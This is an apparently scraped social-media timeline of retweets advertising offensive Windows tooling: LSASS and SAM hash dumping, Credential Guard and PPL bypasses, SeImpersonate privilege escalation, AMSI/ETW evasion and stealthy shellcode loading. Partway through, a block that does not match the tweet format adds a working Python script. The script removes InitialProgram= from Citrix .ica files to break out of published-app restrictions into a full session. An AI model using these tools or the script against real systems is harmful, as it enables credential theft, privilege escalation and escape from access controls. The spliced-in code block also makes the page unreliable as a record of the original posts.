Joined December 2011
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Wrote a BOF that is able to execute .NET assemblies in-memory via module stomping so ETW / AMSI are seeing a legitimate GAC assembly instead - github.com/nettitude/CLR-STO…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Made a quick BOF to exploit the currently unpatched BlueHammer vulnerability to dump SAM hashes from a low integrity context. github.com/incursi0n/BlueSAM
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Releasing GodPotatoBOF: Cobalt Strike BOF used to perform privilege escalation by exploiting the SeImpersonate privilege. OPSEC safe alternative to the .NET version. Based on the original GodPotato PoC by BeichenDream. github.com/incursi0n/GodPota…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Releasing KslKatz. Combining KslDump and GhostKatz to dump LSASS using no-fix KslD.sys memory read to bypass PPL. Extracts MSV1_0 NT hashes and WDigest cleartext passwords (if enabled) from LSASS using a Microsoft-signed driver. github.com/S1lkys/KslKatz
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Huginn Project: Project to generate COFF-format shellcode with API for : - Indirect syscall API - Stack Spoofing - Proxied LoadLibraryA calls Great for UDRLs, stage0 and OPSEC-conscious shellcode. github.com/NtDallas/Huginn
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
WSL2 is a powerful attacker hideout because it runs as a separate Hyper-V VM, and defenders rarely monitor it. Daniel Mayer explains how attackers pivot into WSL2 and what it took to build tooling that works across WSL2 versions. Read more ⬇️ ghst.ly/45fPUma
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
You want to load your shellcode in .NET without calling VirtualProtect? Use RuntimeHelpers.PrepareMethod to create a predictable RWX memory region for you. This method also doesn't require a delegate function pointer, since you override a .NET method. github.com/Mr-Un1k0d3r/Dotne…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Dropped a follow up blog for the talk I did at fwd:cloudsec earlier in the year. Hopefully this makes it easier for people to follow at their own pace about the SharePoint pre-authentication "feature"/issue and orgs can decide to turn it off or not labs.reversec.com/posts/2025…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Best Citrix Breakout ever. You can only download .ica files that provide access to certain local applications, but breaking out of these applications is not possible? Just modify the .ica file before starting it and remove the InitialProgram= value -> Full Citrix Session! 🤓
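The edit described in the post above, as an added example (not code from the original post or from any Citrix tooling): a published .ica file is INI-style text, and the InitialProgram= key in the application section is what pins the client to a single published app. The script below removes that key from every section and reports what it found so the change can be checked before launch. The sample .ica content, the application name and the server address are constructed for this example and are not taken from the post.

```python
"""Remove the InitialProgram= restriction from a Citrix .ica file.

Added example, not from the original post. The sample file, the published
application name and the server address below are constructed/hypothetical.
"""
import re
import sys
from typing import List

# Constructed sample .ica file (hypothetical values, not from any real deployment).
SAMPLE_ICA = """[Encoding]
InputEncoding=UTF8

[WFClient]
Version=2
ClientName=WORKSTATION01

[ApplicationServers]
Notepad Published=

[Notepad Published]
Address=192.0.2.10:1494
InitialProgram=#Notepad Published
ClearPassword=0123456789ABCDEF
TWIMode=On
"""

# Matches an INI key line "InitialProgram=<value>" in any section, case-insensitively.
_INITIAL_PROGRAM_RE = re.compile(r"^\s*InitialProgram\s*=(.*)$", re.IGNORECASE)


def initial_programs(ica_text: str) -> List[str]:
    """Return every InitialProgram value present, so removal can be verified."""
    found = []
    for line in ica_text.splitlines():
        m = _INITIAL_PROGRAM_RE.match(line)
        if m:
            found.append(m.group(1).strip())
    return found


def strip_initial_program(ica_text: str) -> str:
    """Return ica_text with every InitialProgram= line dropped; all other lines are kept verbatim."""
    kept = [line for line in ica_text.splitlines() if not _INITIAL_PROGRAM_RE.match(line)]
    # Preserve the trailing newline if the input had one, so the file round-trips cleanly.
    return "\n".join(kept) + ("\n" if ica_text.endswith("\n") else "")


def rewrite_ica_file(src_path: str, dst_path: str) -> List[str]:
    """Read an .ica file, write a copy without InitialProgram=, and return the removed values."""
    with open(src_path, "r", encoding="utf-8", errors="replace") as fh:
        original = fh.read()
    removed = initial_programs(original)
    with open(dst_path, "w", encoding="utf-8") as fh:
        fh.write(strip_initial_program(original))
    return removed


if __name__ == "__main__":
    # Usage: python strip_ica.py launch.ica launch-desktop.ica
    # Without arguments, demonstrate on the constructed sample.
    if len(sys.argv) == 3:
        for value in rewrite_ica_file(sys.argv[1], sys.argv[2]):
            print(f"removed InitialProgram={value}")
    else:
        print("before:", initial_programs(SAMPLE_ICA))
        print("after: ", initial_programs(strip_initial_program(SAMPLE_ICA)))
```

The script only touches the InitialProgram= key, exactly the change the post describes; the session is then launched from the rewritten file with the normal Citrix client. On the defensive side, whether the server honours a client-side request for a full desktop is a server-side policy question, which is why the breakout is worth testing rather than assuming it is blocked.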
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
8 Feb 2025
🔪Open-sourcing 💀StringReaper BOF! I've had great success in engagements carving credentials out of remote process memory with this BOF github.com/boku7/StringReape…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
23 Jan 2025
I created a hypervisor-based emulator for Windows x64 binaries. This project uses Windows Hypervisor Platform to build a virtualized user-mode environment, allowing syscalls and memory accesses to be logged or intercepted. elastic.co/security-labs/win… Project: github.com/x86matthew/WinVis…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
24 Jan 2025
Wrote a short blog post on: - ETW Threat Intelligence generated by SetThreadContext (hardware breakpoints) - Kernel debugging and reversing - Setting HWBPs in a more "stealthy" manner (not the same ETW TI events generated - no detections) Check it out praetorian.com/blog/etw-thre…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
16 Jan 2025
A few months ago, Microsoft released a critical patch for CVE-2024-43468, an unauthenticated SQL injection vulnerability in SCCM/ConfigMgr leading to remote code execution, discovered by @kalimer0x00. synacktiv.com/advisories/mic…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Achievement unlocked, my first blog with SpecterOps 🤗 This post looks at ADFS OAuth2 support, Device Registration, Enterprise PRT, and a brain dump of things that I didn't want to leave sitting on Notion. posts.specterops.io/adfs-liv…
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
19 Dec 2024
For the next installment in his malware blog series, Principal Security Consultant @_snus walks us through using shared memory sections to inject and execute code in a remote process. Read it now! hubs.la/Q030brbz0
Marcus H. | Archiba 🇱🇰/🇸🇪 retweeted
Today I made public NativeBypassCredGuard, a tool to bypass Credential Guard by patching WDigest.dll using only NTAPI functions: github.com/ricardojoserf/Nat… #redteam #blueteam #offsec